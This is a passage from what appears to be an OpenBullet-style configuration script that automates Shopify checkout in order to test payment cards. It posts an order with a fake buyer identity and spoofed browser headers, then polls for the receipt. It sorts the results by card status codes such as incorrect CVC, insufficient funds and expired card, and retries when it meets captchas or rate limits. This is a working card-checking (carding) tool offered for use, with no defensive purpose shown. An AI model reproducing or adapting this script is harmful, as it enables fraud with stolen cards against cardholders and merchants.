street\",\"city\":\"california\",\"countryCode\":\"US\",\"postalCode\":\"90001\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"CA\",\"phone\":\"16125626619\"}}},\"buyerIdentity\":{\"customer\":{\"presentmentCurrency\":\"<currency_code>\",\"countryCode\":\"<country_code>\"},\"email\":\"gmail123456@gmail.com\",\"emailChanged\":false,\"phoneCountryCode\":\"<country_code>\",\"marketingConsent\":[],\"shopPayOptInPhone\":{\"countryCode\":\"<country_code>\"},\"rememberMe\":false},\"tip\":{\"tipLines\":[]},\"taxes\":{\"proposedAllocations\":null,\"proposedTotalAmount\":{\"value\":{\"amount\":\"<tax3>\",\"currencyCode\":\"<currency_code>\"}},\"proposedTotalIncludedAmount\":null,\"proposedMixedStateTotalAmount\":null,\"proposedExemptions\":[]},\"note\":{\"message\":null,\"customAttributes\":[]},\"localizationExtension\":{\"fields\":[]},\"nonNegotiableTerms\":null,\"scriptFingerprint\":{\"signature\":null,\"signatureUuid\":null,\"lineItemScriptChanges\":[],\"paymentScriptChanges\":[],\"shippingScriptChanges\":[]},\"optionalDuties\":{\"buyerRefusesDuties\":false},\"captcha\":null,\"cartMetafields\":[]},\"attemptToken\":\"<tok>-4j33p1vmcd5\",\"metafields\":[],\"analytics\":{\"requestUrl\":\"<checkout_url>\",\"pageId\":\"0cde623b-7B13-4911-E150-61A3736179ED\"},\"operationName\":\"SubmitForCompletion\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://<site>" 
  HEADER "Referer: https://<site>" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?0" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Shopify-Checkout-Client: checkout-web/1.0" 
  HEADER "X-Checkout-One-Session-Token: <x_check>" 
  HEADER "X-Checkout-Web-Build-Id: <web_build>" 
  HEADER "X-Checkout-Web-Deploy-Stage: production" 
  HEADER "X-Checkout-Web-Server-Handling: fast" 
  HEADER "X-Checkout-Web-Server-Rendering: yes" 
  HEADER "X-Checkout-Web-Source-Id: <tok>" 
  HEADER "Pragma: no-cache" 

bill PARSE "<SOURCE>" LR "\"receipt\":{\"id\":\"" "\"," CreateEmpty=FALSE -> VAR "bill" 

# Step 9: Poll for Receipt
REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=PollForReceipt" 
  CONTENT "{\"query\":\"query PollForReceipt($receiptId:ID!,$sessionToken:String!){receipt(receiptId:$receiptId,sessionInput:{sessionToken:$sessionToken}){...ReceiptDetails __typename}}fragment ReceiptDetails on Receipt{...on ProcessedReceipt{id token redirectUrl confirmationPage{url shouldRedirect __typename}orderStatusPageUrl shopPay shopPayInstallments paymentExtensionBrand analytics{checkoutCompletedEventId emitConversionEvent __typename}poNumber orderIdentity{buyerIdentifier id __typename}customerId isFirstOrder eligibleForMarketingOptIn purchaseOrder{...ReceiptPurchaseOrder __typename}orderCreationStatus{__typename}paymentDetails{paymentCardBrand creditCardLastFourDigits paymentAmount{amount currencyCode __typename}paymentGateway financialPendingReason paymentDescriptor buyerActionInfo{...on MultibancoBuyerActionInfo{entity reference __typename}__typename}paymentIcon __typename}shopAppLinksAndResources{mobileUrl qrCodeUrl canTrackOrderUpdates shopInstallmentsViewSchedules shopInstallmentsMobileUrl installmentsHighlightEligible mobileUrlAttributionPayload shopAppEligible shopAppQrCodeKillswitch shopPayOrder payEscrowMayExist buyerHasShopApp buyerHasShopPay orderUpdateOptions __typename}postPurchasePageUrl postPurchasePageRequested postPurchaseVaultedPaymentMethodStatus paymentFlexibilityPaymentTermsTemplate{__typename dueDate dueInDays id translatedName type}completedRemoteCheckouts{...CompletedRemoteCheckouts __typename}consolidatedTotals{subtotalBeforeTaxesAndShipping{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}subtotalBeforeReductions{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}runningTotal{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}totalSavings{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}total{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}checkoutTotalTaxes{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}checkoutTotalBeforeTaxesAndShipping{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}checkoutTotal{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}__typename}consolidatedTaxes{totalTaxAmount{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}totalTaxAndDutyAmount{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}taxesIncludedAmountInTarget{...on MoneyValueConstraint{value{amount currencyCode __typename}__typename}__typename}__typename}consolidatedProposedSubtotalBeforeTaxesAndShipping{amount currencyCode __typename}__typename}...on ProcessingReceipt{id purchaseOrder{...ReceiptPurchaseOrder __typename}pollDelay __typename}...on WaitingReceipt{id pollDelay __typename}...on ProcessingRemoteCheckoutsReceipt{id pollDelay remoteCheckouts{...on SubmittingRemoteCheckout{shopId __typename}...on SubmittedRemoteCheckout{shopId __typename}...on FailedRemoteCheckout{shopId __typename}__typename}__typename}...on ActionRequiredReceipt{id action{...on CompletePaymentChallenge{offsiteRedirect url __typename}...on CompletePaymentChallengeV2{challengeType challengeData __typename}__typename}timeout{millisecondsRemaining __typename}__typename}...on FailedReceipt{id processingError{...on InventoryClaimFailure{__typename}...on InventoryReservationFailure{__typename}...on OrderCreationFailure{paymentsHaveBeenReverted __typename}...on OrderCreationSchedulingFailure{__typename}...on PaymentFailed{code messageUntranslated hasOffsitePaymentMethod __typename}...on DiscountUsageLimitExceededFailure{__typename}...on CustomerPersistenceFailure{__typename}__typename}__typename}__typename}\",\"variables\":{\"receiptId\":\"<bill>\",\"sessionToken\":\"<x_check>\"},\"operationName\":\"PollForReceipt\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://<site>" 
  HEADER "Referer: https://<site>" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?0" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "X-Checkout-One-Session-Token: <x_check>" 
  HEADER "X-Checkout-Web-Build-Id: <web_build>" 
  HEADER "X-Checkout-Web-Deploy-Stage: production" 
  HEADER "X-Checkout-Web-Server-Handling: fast" 
  HEADER "X-Checkout-Web-Server-Rendering: no" 
  HEADER "X-Checkout-Web-Source-Id: <tok>" 
  HEADER "Pragma: no-cache" 

raw PARSE "<SOURCE>" LR "" "" -> VAR "raw" 

cc_status PARSE "<SOURCE>" LR "\"code\":\"" "\"," CreateEmpty=FALSE -> CAP "cc_status" 

cc_status2 PARSE "<SOURCE>" LR "\"__typename\":\"" "\"}" CreateEmpty=FALSE -> CAP "cc_status2" 

cc_status3 PARSE "<SOURCE>" LR "\"__typename\":\"" "\"}," CreateEmpty=FALSE -> CAP "cc_status3" 

cc_status4 PARSE "<SOURCE>" LR "\"confirmationPage\":{\"url\":\"" "\",\"shouldRedirect\"" CreateEmpty=FALSE -> VAR "cc_status4" 

cc_status5 PARSE "<SOURCE>" LR "\"url\":\"" "\",\"" CreateEmpty=FALSE -> CAP "cc_status5" 

cc_status6 PARSE "<SOURCE>" LR "\"checkoutCompletionTarget\":\"" "\"" CreateEmpty=FALSE -> VAR "cc_status6" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<cc_status>" Contains "CAPTCHA_REQUIRED" 
    KEY "<cc_status>" Contains "HCAPTCHA" 
    KEY "<cc_status>" Contains "RECAPTCHA" 
    KEY "Just a moment" 
    KEY "<cc_status>" Contains "SITE_EMPTY" 
    KEY "<cc_status>" Contains "SITE_HTML" 
    KEY "<cc_status>" Contains "SITE_CAPTCHA" 
    KEY "<cc_status>" Contains "SITE_HTTP" 
    KEY "<cc_status>" Contains "SITE_CONNECTION" 
    KEY "<cc_status>" Contains "NO_AVAILABLE_PRODUCTS" 
    KEY "<cc_status>" Contains "CART_ERROR" 
    KEY "<cc_status>" Contains "CART_HTML" 
    KEY "<cc_status>" Contains "CART_INVALID" 
    KEY "<cc_status>" Contains "CART_CREATION" 
    KEY "<cc_status>" Contains "CHECKOUT_HTTP" 
    KEY "<cc_status>" Contains "CHECKOUT_TOKENS_MISSING" 
    KEY "<cc_status>" Contains "NEGOTIATE_HTTP" 
    KEY "<cc_status>" Contains "SUBMIT_HTTP" 
    KEY "<cc_status>" Contains "RECEIPT_EMPTY" 
    KEY "<cc_status>" Contains "TIMEOUT" 
    KEY "<cc_status>" Contains "FAILED" 
    KEY "<cc_status>" Contains "ERROR" 
    KEY "<cc_status>" Contains "BLOCKED" 
    KEY "<cc_status>" Contains "PROXY" 
    KEY "<cc_status>" Contains "DEAD" 
    KEY "<cc_status>" Contains "EMPTY" 
  KEYCHAIN Retry OR 
    KEY "<cc_status>" Contains "CAPTCHA_REQUIRED" 
    KEY "<cc_status>" Contains "HCAPTCHA" 
    KEY "<cc_status>" Contains "RECAPTCHA" 
    KEY "Just a moment" 
    KEY "<cc_status>" Contains "Throttled" 
    KEY "<cc_status>" Contains "429" 
    KEY "<cc_status>" Contains "RATE LIMIT" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<cc_status>" Contains "GENERIC_ERROR" 
    KEY "<cc_status>" Contains "CARD_DECLINED" 
    KEY "<cc_status>" Contains "DECLINED" 
    KEY "<cc_status>" Contains "INCORRECT_NUMBER" 
    KEY "<cc_status>" Contains "AUTHENTICATION_FAILED" 
    KEY "<cc_status>" Contains "FRAUD_SUSPECTED" 
    KEY "<cc_status2>" Contains "PaymentFailed" 
    KEY "<cc_status>" Contains "INVALID_NUMBER" 
    KEY "<cc_status>" Contains "PAYMENTS_CREDIT_CARD_NUMBER_INVALID_FORMAT" 
    KEY "<cc_status>" Contains "INSUFFICIENT_FUNDS" 
    KEY "<cc_status>" Contains "INCORRECT_ADDRESS" 
    KEY "<cc_status>" Contains "INCORRECT_ZIP" 
    KEY "<cc_status>" Contains "INCORRECT_PIN" 
    KEY "<cc_status>" Contains "INCORRECT_CVC" 
    KEY "<cc_status>" Contains "CARD_EXPIRED" 
    KEY "<cc_status>" Contains "CARD_NOT_SUPPORTED" 
    KEY "<cc_status>" Contains "3DS" 
    KEY "<cc_status>" Contains "3D_SECURE" 
    KEY "<cc_status>" Contains "AUTHENTICATION_REQUIRED" 
    KEY "<cc_status>" Contains "CVV_MISMATCH" 
    KEY "<cc_status>" Contains "CompletePaymentChallenge" 
    KEY "<cc_status>" Contains "ProcessingReceipt" 
  KEYCHAIN Success OR 
    KEY "<cc_status>" Contains "ORDER_PLACED" 
    KEY "<cc_status>" EqualTo "ORDER_PLACED" 
    KEY "ORDER_PLACED" 
    KEY "<cc_status4>" Contains "thank_you" 
    KEY "<cc_status5>" Contains "thank_you" 
    KEY "<cc_status3>" EqualTo "ConfirmationPage" 
    KEY "<cc_status6>" EqualTo "ORDER" 
    KEY "<cc_status2>" Contains "ProcessedReceipt" 
    KEY "<raw>" Contains "ProcessedReceipt" 
    KEY "<raw>" Contains "thank_you" 
    KEY "<raw>" Contains "thank" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<cc_status2>" Contains "AUTHENTICATION_FAILED" 
    KEY "<cc_status2>" Contains "insufficient_funds" 
    KEY "<cc_status>" Contains "INSUFFICIENT_FUNDS" 
    KEY "<cc_status>" Contains "CompletePaymentChallenge" 
    KEY "<cc_status2>" Contains "CompletePaymentChallenge" 
    KEY "<cc_status2>" Contains "ProcessingReceipt" 
    KEY "<cc_status>" Contains "INCORRECT_ADDRESS" 
    KEY "<cc_status>" Contains "INCORRECT_ZIP" 
    KEY "<cc_status>" Contains "INCORRECT_PIN" 
    KEY "<cc_status>" Contains "INCORRECT_CVC" 

Gateway FUNCTION Constant "Shopify Normal" -> CAP "Gateway" 
